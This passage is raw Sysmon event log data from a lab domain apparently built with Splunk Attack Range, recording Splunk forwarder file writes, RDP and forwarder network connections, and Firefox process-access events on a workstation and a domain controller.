Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17C92C0A3C36F78984EB9336EB0C2988,SHA256=A0C9AF66A2E3A7E5E8302DB27D6087D6E1CB61B1D6D44792E5717B3F7248E538,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979283Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:08.837{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DFD8E86B76CBE89F59075DB10B872FDC,SHA256=117A6203A72E728724AB84749A6BF73BB761A9AFAAF6ED148C9B6B596529CC41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979282Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:08.790{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F09AA5CF1530B2CA03F0D91A458F8ACD,SHA256=DFA7A65807800C947B351FF9025AE90851B26A6A2702B1A1EE644956C6C78894,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050648Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:08.337{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EB7D6EB0439B67139935E85DABD982B,SHA256=4F400A21CCF733A89B73297EDBD8EDE467755D90A588FCE68D2D3AA1DD47ED94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979287Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:09.978{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C5B198963B430DACCFAFA9E76738CFC,SHA256=1D48E303FBCB1EE70310F944B6E06FA4187494DC9DB13A98A55B8E95F2E79DA7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050651Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:06.779{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53399-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050650Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:09.621{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=43B87C379386B73C04ACF1B46AED10A8,SHA256=CC5A11A9F3A357C8F3547C3C304E2EA137E57AFAD9210D4D7404F56BD6A594F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050649Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:09.352{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0966434B5F676825A22C7B389FE0987D,SHA256=32BEDB7DE2F289028FA915284EE30D629BEDE5440CF3FA14B4077A8C10B833B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979286Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:06.421{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54898-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979285Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:05.777{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54599-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979284Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:05.743{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59411-false10.0.1.12-8000- 23542300x8000000000000000979289Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:10.993{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F40B9229BCB92AAD6FEE7AC4359D37E,SHA256=73C7F7AFB61B98C7AFCA34059C9C4C1E62E8EA432A2DF3848365027FCF920E32,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050653Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:07.865{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55122-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050652Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:10.353{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=001355B8446B7544286EEB72A240B910,SHA256=1837A001D39C72063942BCD98F9F0F35D16D651C4A6FAAB692538BF2CBA9D792,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979288Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:10.118{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1392CB6E81045C0FECD537E4C95095AF,SHA256=D05691C87C05F72129C52186088CA3582BDFFA1CB3518820BB9D86431A867CAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050655Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:11.353{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23CFDE7990FD03FB103B2BFD44715927,SHA256=A26B486F04D4EC766B9B208A86B56F803624C45D5A7069EDC772893CB9CCF001,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050654Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:11.037{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001050658Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:10.651{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56871-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050657Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:12.368{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6085838568C9E964E87CBC8C5E8E60F,SHA256=D050C98ECF6EF2F0460E68461E73D6A4564D89E0E1A8041A5CBBA422542183F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979290Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:12.009{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2046C4E6821A763CD20A83FA026ABA5C,SHA256=66D2AE6C575AC9AE6B7DD606DB250A03FFD768ADDCA1B0845A6389BDA8E5B635,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050656Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:12.268{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C51E0D9E113FD08A1E1866F1CED6D877,SHA256=9B856CAF2C21649D4A19F0856450789DB57C8D351F7576E039AB6EE45766C092,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050659Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:13.376{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81F4714C959A98ADB337A388CC32C8B1,SHA256=465F110153194DCD62FC1BCF4CA1BD41F24E8BDE5252CE40B1C0B0BC0CD02EE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979293Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:13.728{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979292Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:10.760{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59412-false10.0.1.12-8000- 23542300x8000000000000000979291Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:13.025{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA8C1CD064FE916F88D33E824BD93737,SHA256=C25E4613FF06E91520BB6774F8777A51B2E7D27442053A913B38B6496C49BCE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050661Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:12.729{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53400-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050660Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:14.429{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=561A784888433F17B098131079E685F9,SHA256=951DDE821532BB1BB6EAEBFD6902445456E943861334EDB5AAAA682C8118DDCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979295Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:14.947{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5A4C56C89C0EA724FD19DD80B472642A,SHA256=BC4C6DC8DC384B236D4F2EB60C70FB760F04B42D677FA36454F454FD7D9F3BBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979294Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:14.072{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5CE865F65C8232CABE28B9EED5B5C2C,SHA256=7FFDBEDDDA8C055985AD69CD0AD9C8AA38C06418CBB6EB52F0DB2D25A6B07EA9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979298Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:12.355{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59413-false10.0.1.12-8089- 354300x8000000000000000979297Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:12.242{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59523-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979296Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:15.259{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F01964F3D264EDEAE0FE8124C6A1094,SHA256=C05A059DF7365C1C32079DA390FEED9BA75015EAD8341448480B1DE867FDB9EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050662Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:15.444{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F3E927C6E844FC7B5D7EE2AC11CF590,SHA256=9CB98F2C309D84D7FE321A03A03374EC8B991C1DFCABD1123E7DAF4056B4FB98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979299Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:16.384{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09A152C3DF705935C5698136DBEDE284,SHA256=15FBBF5B5B55760AAB8DD447FE967ADA950B3005655A9085A84368FDF34708E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050663Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:16.451{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFD7993FF0DED532E069EA99F1BB0803,SHA256=741CB232BBDCB1B44658F5E7F5072C6CA2619735B064654ACC5D4F0CCD2B62F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979301Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:17.993{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2ADF9EBC7AE2C4F0078467E020356E15,SHA256=AE1F66D6061AAF83B5FDB13FD24F0241D20A646025006F3FA8C0D79586883E69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979300Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:17.603{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD182108C4FB4EF9691933DC48F75612,SHA256=E2CEF3025ADDC35A9B3C9D6C51748808F30C840FECEDE6DBBB7F0EC13C0D5E54,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050668Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:16.058{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53401-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001050667Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:16.058{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53401-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001050666Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:17.483{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D52B51DA5AE307FC13D0C8EF3A992C8B,SHA256=7F78D641CC68C227C3C852645F0659005C15E1237A790129154E8FD55B186EEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050665Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:17.383{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0514A297D7EEF30E8C3C1DE62B3C4153,SHA256=FAA4661879BF9A4AC8871DC79CF2FC37AAEC98090FDA9E6C833407AB783F0954,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050664Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:17.383{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3DF5B9C1BB6C971328FEA5DEE34A196F,SHA256=B2720A204DD9942B6AF98992E404E88DDF0F5EF4E0C2E82D8259430443672C84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979305Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:18.728{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=492463EC30572005ECED5112C7337104,SHA256=707DF4EE69A2955C2F995FF4EBA21BCD5F42508F4293B85549F0BB1C73A9EA6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050669Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:18.501{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B254210CBD9C19D49DC82EE02BDE964C,SHA256=B7170F93686A4562CFEA6F0EA4D3575FBE026813C9E7638FC88D88CE936A95CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979304Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:15.838{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59414-false10.0.1.12-8000- 354300x8000000000000000979303Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:15.828{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de59318-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979302Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:15.220{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60407-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979306Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:19.744{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE4DB9D2A99BAE63C1077D85FA37263E,SHA256=0BE59F1EBF9AB7A0792EFC38E2D15ECC23A7D3A33D0800CC8DE7CADA379F8BD1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050673Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:18.284{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61667-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001050672Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:17.859{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53402-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001050671Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:19.619{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050670Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:19.519{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=257845B137BAF54C98E3BB0C22F99785,SHA256=3B68A463795A544636A6C2A5503D47A8A7FF75A5413AB717584CB71B99AC88FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979307Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:14:20.978{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=434FB5435FC21A8AE0A797A79D0570B3,SHA256=DFCCCED73BA4D6CFD3DB32A924D9D05A78322060A61E3A12EBEF698621905D55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050675Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:20.565{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=499161B808A3A089B747264EC96749CE,SHA256=E08B206586B22231BBA85139CF65F48FCD79280CA88E57C669ADB3DB060F7141,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050674Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:20.565{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0514A297D7EEF30E8C3C1DE62B3C4153,SHA256=FAA4661879BF9A4AC8871DC79CF2FC37AAEC98090FDA9E6C833407AB783F0954,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050677Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:14:21.582{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 